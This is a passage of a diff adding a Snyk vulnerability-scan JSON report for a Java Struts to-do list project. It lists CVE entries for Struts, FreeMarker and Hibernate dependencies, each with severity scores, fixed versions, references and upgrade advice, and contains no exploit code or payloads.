"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.20.3", + "org.apache.struts.xwork:xwork-core@2.3.20.3" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts.xwork:xwork-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-474418", + "title": "Insecure Defaults", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "credit": [ + "Jasper Rosenberg" + ], + "semver": { + "vulnerable": [ + "[2.3.20,2.3.20.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.3.20.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts.xwork:xwork-core", + "references": [ + { + "url": "https://github.com/apache/struts/commit/5ebc0643b55d728a6713a82559a594d875452cd8", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/struts/commit/d832747d647df343ed07a58b1b5e540a05a4d51b", + "title": "GitHub Commit" + }, + { + "url": "https://issues.apache.org/jira/browse/WW-4486", + "title": "Jira Issue" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1831", + "title": "NVD" + }, + { + "url": "https://struts.apache.org/docs/s2-024.html", + "title": "Struts Security Advisory" + }, + { + "url": "http://struts.apache.org/docs/s2-024.html", + "title": "Vulnerability Summary" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:52:26.053752Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:02.093877Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:26.053752Z" + } + ], + "description": "## Overview\n[org.apache.struts.xwork:xwork-core](https://mvnrepository.com/artifact/org.apache.struts.xwork/xwork-core) is a generic command pattern framework. It forms the core of Struts 2.\n\nAffected versions of this package are vulnerable to Insecure Defaults. The default exclude patterns (excludeParams) allow remote attackers to \"compromise internal state of an application\" via unspecified vectors.\n## Remediation\nUpgrade `org.apache.struts.xwork:xwork-core` to version 2.3.20.1 or higher.\n## References\n- [GitHub Commit](https://github.com/apache/struts/commit/5ebc0643b55d728a6713a82559a594d875452cd8)\n- [GitHub Commit](https://github.com/apache/struts/commit/d832747d647df343ed07a58b1b5e540a05a4d51b)\n- [Jira Issue](https://issues.apache.org/jira/browse/WW-4486)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1831)\n- [Struts Security Advisory](https://struts.apache.org/docs/s2-024.html)\n- [Vulnerability Summary](http://struts.apache.org/docs/s2-024.html)\n", + "epssDetails": { + "percentile": "0.85294", + "probability": "0.01190", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2015-1831" + ], + "CWE": [ + "CWE-453" + ] + }, + "packageName": "org.apache.struts.xwork:xwork-core", + "proprietary": false, + "creationTime": "2019-10-27T13:46:24.359760Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2015-05-11T16:51:55Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts.xwork", + "artifactId": "xwork-core" + }, + "publicationTime": "2015-05-11T16:51:55Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:52:26.053752Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.20.1", + "org.apache.struts.xwork:xwork-core@2.3.20.1" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts.xwork:xwork-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-5811864", + "title": "Improper Input Validation", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Huawei PSIRT" + ], + "semver": { + "vulnerable": [ + "[2.0.0,2.3.24.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.3.24.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.8, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts.xwork:xwork-core", + "references": [ + { + "url": "https://github.com/apache/struts/commit/f420f28466cb82915defc4e12466b298c275abaf", + "title": "GitHub Commit" + }, + { + "url": "https://struts.apache.org/docs/s2-027.html", + "title": "Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:46:51.429176Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:53.537810Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:51.429176Z" + } + ], + "description": "## Overview\n[org.apache.struts.xwork:xwork-core](https://mvnrepository.com/artifact/org.apache.struts.xwork/xwork-core) is a generic command pattern framework. It forms the core of Struts 2.\n\nAffected versions of this package are vulnerable to Improper Input Validation such that the `TextParseUtil.translateVariables` method allows remote attackers to execute arbitrary code via a crafted OGNL expression with ANTLR tooling.\r\n\r\n**Note:**\r\n\r\nThe Struts 2 framework does not pass any user-modifiable input to this method, neither directly nor indirectly. However, a developer crafting a Struts based web application might pass unsanitized user input to `TextParseUtil.translateVariables` or ActionSupport's `getText` methods. In that case a RCE exploitation might be possible.\r\n\r\n## Workaround\r\n\r\nUsers who are unable to upgrade to the fixed version should not pass unsanitized user input to framework methods that include OGNL expression evaluation.\n## Remediation\nUpgrade `org.apache.struts.xwork:xwork-core` to version 2.3.24.1 or higher.\n## References\n- [GitHub Commit](https://github.com/apache/struts/commit/f420f28466cb82915defc4e12466b298c275abaf)\n- [Issue](https://struts.apache.org/docs/s2-027.html)\n", + "epssDetails": { + "percentile": "0.86301", + "probability": "0.01352", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-3090" + ], + "CWE": [ + "CWE-20" + ], + "GHSA": [ + "GHSA-ggmp-fxfg-277r" + ] + }, + "packageName": "org.apache.struts.xwork:xwork-core", + "proprietary": false, + "creationTime": "2023-08-01T07:46:40.919855Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-05-14T03:15:07Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts.xwork", + "artifactId": "xwork-core" + }, + "publicationTime": "2023-08-01T09:22:02.765398Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:46:51.429176Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.24.1", + "org.apache.struts.xwork:xwork-core@2.3.24.1" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts.xwork:xwork-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGFREEMARKER-1076795", + "title": "Server-side Template Injection (SSTI)", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "credit": [ + "Ackcent" + ], + "semver": { + "vulnerable": [ + "[,2.3.30)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.3.30" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.freemarker:freemarker", + "references": [ + { + "url": "https://github.com/apache/freemarker/pull/62", + "title": "GitHub PR" + }, + { + "url": "https://issues.apache.org/jira/browse/FREEMARKER-124", + "title": "Jira Issue" + }, + { + "url": "https://ackcent.com/in-depth-freemarker-template-injection/", + "title": "Research Blogpost" + } + ], + "cvssDetails": [], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:04:29.670906Z" + } + ], + "description": "## Overview\n[org.freemarker:freemarker](https://github.com/apache/freemarker) is a \"template engine\"; a generic tool to generate text output (anything from HTML to auto generated source code) based on templates.\n\nAffected versions of this package are vulnerable to Server-side Template Injection (SSTI). By allowing user input into `java.security.ProtectionDomain.getClassLoader`, templates will get access to the java classloader. This can be further leveraged for file system access and code execution. A low-privileged user is sufficient for exploitation of this vulnerability.\n## Remediation\nUpgrade `org.freemarker:freemarker` to version 2.3.30 or higher.\n## References\n- [GitHub PR](https://github.com/apache/freemarker/pull/62)\n- [Jira Issue](https://issues.apache.org/jira/browse/FREEMARKER-124)\n- [Research Blogpost](https://ackcent.com/in-depth-freemarker-template-injection/)\n", + "epssDetails": null, + "identifiers": { + "CVE": [], + "CWE": [ + "CWE-94" + ] + }, + "packageName": "org.freemarker:freemarker", + "proprietary": false, + "creationTime": "2021-02-19T11:41:17.941362Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2020-04-09T11:33:30Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.freemarker", + "artifactId": "freemarker" + }, + "publicationTime": "2021-02-19T15:54:24Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-06T14:04:29.670906Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20", + "org.freemarker:freemarker@2.3.19" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.5.25", + "org.freemarker:freemarker@2.3.30" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.freemarker:freemarker", + "version": "2.3.19" + }, + { + "id": "SNYK-JAVA-ORGHIBERNATE-1041788", + "title": "SQL Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N/E:U/RL:O/RC:U", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,5.4.24.Final)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "5.4.24.Final" + ], + "patches": [], + "insights": { + "triageAdvice": "This vulnerability is only applicable on systems using JPA Criteria API" + }, + "language": "java", + "severity": "high", + "cvssScore": 8.2, + "functions": [ + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/loader/plan/exec/query/internal/SelectStatementBuilder.java", + "className": "SelectStatementBuilder", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/Delete.java", + "className": "Delete", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/Insert.java", + "className": "Insert", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/InsertSelect.java", + "className": "InsertSelect", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/QuerySelect.java", + "className": "QuerySelect", + "functionName": "toQueryString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/Select.java", + "className": "Select", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/SimpleSelect.java", + "className": "SimpleSelect", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/Update.java", + "className": "Update", + "functionName": "toStatementString" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.hibernate:hibernate-core", + "references": [ + { + "url": "https://github.com/hibernate/hibernate-orm/commit/59fede7acaaa1579b561407aefa582311f7ebe78", + "title": "GitHub Commit" + }, + { + "url": "https://access.redhat.com/security/cve/cve-2020-25638", + "title": "Redhat CVE Details" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", + "cvssV3BaseScore": 7.4, + "modificationTime": "2024-03-11T09:50:47.602540Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", + "cvssV3BaseScore": 7.4, + "modificationTime": "2024-03-11T09:53:47.086548Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N/E:U/RL:O/RC:U", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.2, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:14.190706Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.4, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:47.602540Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.4, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:47.086548Z" + } + ], + "description": "## Overview\n[org.hibernate:hibernate-core](https://github.com/hibernate/hibernate-orm) is a library providing Object/Relational Mapping (ORM) support to applications, libraries, and frameworks.\n\nAffected versions of this package are vulnerable to SQL Injection. A SQL injection in the implementation of the JPA Criteria API can permit unsanitized literals when a literal is used in the SQL comments of the query. This flaw could allow an attacker to access unauthorized information or possibly conduct further attacks. The highest threat from this vulnerability is to data confidentiality and integrity.\n## Remediation\nUpgrade `org.hibernate:hibernate-core` to version 5.4.24.Final or higher.\n## References\n- [GitHub Commit](https://github.com/hibernate/hibernate-orm/commit/59fede7acaaa1579b561407aefa582311f7ebe78)\n- [Redhat CVE Details](https://access.redhat.com/security/cve/cve-2020-25638)\n", + "epssDetails": { + "percentile": "0.72103", + "probability": "0.00352", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-25638" + ], + "CWE": [ + "CWE-89" + ] + }, + "packageName": "org.hibernate:hibernate-core", + "proprietary": false, + "creationTime": "2020-11-19T16:51:52.251545Z", + "functions_new": [ + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.loader.plan.exec.query.internal.SelectStatementBuilder", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.Delete", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.Insert", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.InsertSelect", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.QuerySelect", + "functionName": "toQueryString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.Select", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.SimpleSelect", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.Update", + "functionName": "toStatementString" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-11-19T16:51:45Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.hibernate", + "artifactId": "hibernate-core" + }, + "publicationTime": "2020-11-19T16:57:14.572204Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:47.086548Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "org.hibernate:hibernate-core", + "version": "4.3.7.Final" + }, + { + "id": "SNYK-JAVA-ORGHIBERNATE-584563", + "title": "SQL Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Gail Badner" + ], + "semver": { + "vulnerable": [ + "[,5.3.18.Final)", + "[5.4.0.Final, 5.4.18.Final)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.3.18.Final", + "5.4.18.Final" + ], + "patches": [], + "insights": { + "triageAdvice": "This vulnerability is only applicable on systems using JPA Criteria API" + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[5.1.18.Final ,5.4.18.Final)" + ], + "functionId": { + "filePath": "org/hibernate/query/criteria/internal/expression/LiteralExpression.java", + "className": "LiteralExpression", + "functionName": "renderProjection" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.hibernate:hibernate-core", + "references": [ + { + "url": "https://github.com/hibernate/hibernate-orm/pull/3438", + "title": "GitHub Pull Request" + }, + { + "url": "https://hibernate.atlassian.net/browse/HHH-14077", + "title": "Jira Ticket" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:51:28.265729Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:53:49.262550Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:47.723462Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:28.265729Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:49.262550Z" + } + ], + "description": "## Overview\n[org.hibernate:hibernate-core](https://github.com/hibernate/hibernate-orm) is a library providing Object/Relational Mapping (ORM) support to applications, libraries, and frameworks.\n\nAffected versions of this package are vulnerable to SQL Injection. A SQL injection in the implementation of the JPA Criteria API can permit unsanitized literals when a literal is used in the SELECT or GROUP BY parts of the query. This flaw could allow an attacker to access unauthorized information or possibly conduct further attacks.\n## Remediation\nUpgrade `org.hibernate:hibernate-core` to version 5.3.18.Final, 5.4.18.Final or higher.\n## References\n- [GitHub Pull Request](https://github.com/hibernate/hibernate-orm/pull/3438)\n- [Jira Ticket](https://hibernate.atlassian.net/browse/HHH-14077)\n", + "epssDetails": { + "percentile": "0.42797", + "probability": "0.00104", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-14900" + ], + "CWE": [ + "CWE-89" + ] + }, + "packageName": "org.hibernate:hibernate-core", + "proprietary": false, + "creationTime": "2020-07-15T13:53:15.331818Z", + "functions_new": [ + { + "version": [ + "[5.1.18.Final ,5.4.18.Final)" + ], + "functionId": { + "className": "org.hibernate.query.criteria.internal.expression.LiteralExpression", + "functionName": "renderProjection" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-06-18T13:46:30Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.hibernate", + "artifactId": "hibernate-core" + }, + "publicationTime": "2020-07-15T16:40:12Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:49.262550Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "org.hibernate:hibernate-core", + "version": "4.3.7.Final" + }, + { + "id": "snyk:lic:maven:org.hibernate:hibernate-core:LGPL-2.0", + "type": "license", + "title": "LGPL-2.0 license", + "semver": { + "vulnerable": [ + "[3.3.0.CR1, 5.3.1.Final)" + ] + }, + "license": "LGPL-2.0", + "language": "java", + "description": "LGPL-2.0 license", + "packageName": "org.hibernate:hibernate-core", + "creationTime": "2024-06-18T19:09:16.096Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T19:09:16.096Z", + "severity": "medium", + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "org.hibernate:hibernate-core", + "version": "4.3.7.Final" + }, + { + "id": "SNYK-JAVA-ORGHIBERNATE-30098", + "title": "JSM bypass via ReflectionHelper", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[4.1.0.Beta1, 4.3.2.Final)", + "[5.0.0.Final,5.1.2.Final)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "4.3.2.Final", + "5.1.2.Final" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.hibernate:hibernate-validator", + "references": [ + { + "url": "https://github.com/hibernate/hibernate-validator/commit/2c95d4ea0ef20977be249e31a4a4f4f4f71c945d", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/hibernate/hibernate-validator/commit/67fdff14831c035c25e098fe14bd86523d17f726", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/hibernate/hibernate-validator/commit/7e7131939a4361a7cad3e77ab89a8462132c561c", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/hibernate/hibernate-validator/commit/c489416f699a46859c134796b3ccfea41ef3ce52", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/hibernate/hibernate-validator/commit/c9525ca544b1281e2b7c7347e86e87c86dc1dc6e", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/hibernate/hibernate-validator/commit/e8c42b689df8c6752d635d02c6518da3fece3870", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/hibernate/hibernate-validator/commit/f97c2021a03c825abdeca1692f5be51e77e76a8f", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/hibernate/hibernate-validator/commit/fd4eaed7fb930db6a5e4c03742b4b3adcfecc90e", + "title": "GitHub Commit" + }, + { + "url": "https://hibernate.atlassian.net/browse/HV-912", + "title": "Jira Issue" + }, + { + "url": "https://bugzilla.redhat.com/CVE-2014-3558", + "title": "Redhat Bugzilla" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:46:09.119807Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", + "cvssV3BaseScore": 4.4, + "modificationTime": "2024-03-11T09:48:45.778673Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:01:48.734535Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:46:09.119807Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 4.4, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:45.778673Z" + } + ], + "description": "## Overview\n[org.hibernate:hibernate-validator](https://mvnrepository.com/artifact/org.hibernate/hibernate-validator) is a Hibernate Validator Engine Relocation Artifact.\n\nAffected versions of this package are vulnerable to JSM bypass via ReflectionHelper. ReflectionHelper (`org.hibernate.validator.util.ReflectionHelper`) in Hibernate Validator 4.1.0 before 4.2.1, 4.3.x before 4.3.2, and 5.x before 5.1.2 allows attackers to bypass Java Security Manager (JSM) restrictions and execute restricted reflection calls via a crafted application.\n## Remediation\nUpgrade `org.hibernate:hibernate-validator` to version 4.3.2.Final, 5.1.2.Final or higher.\n## References\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/2c95d4ea0ef20977be249e31a4a4f4f4f71c945d)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/67fdff14831c035c25e098fe14bd86523d17f726)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/7e7131939a4361a7cad3e77ab89a8462132c561c)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/c489416f699a46859c134796b3ccfea41ef3ce52)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/c9525ca544b1281e2b7c7347e86e87c86dc1dc6e)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/e8c42b689df8c6752d635d02c6518da3fece3870)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/f97c2021a03c825abdeca1692f5be51e77e76a8f)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/fd4eaed7fb930db6a5e4c03742b4b3adcfecc90e)\n- [Jira Issue](https://hibernate.atlassian.net/browse/HV-912)\n- [Redhat Bugzilla](https://bugzilla.redhat.com/CVE-2014-3558)\n", + "epssDetails": { + "percentile": "0.70800", + "probability": "0.00319", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2014-3558" + ], + 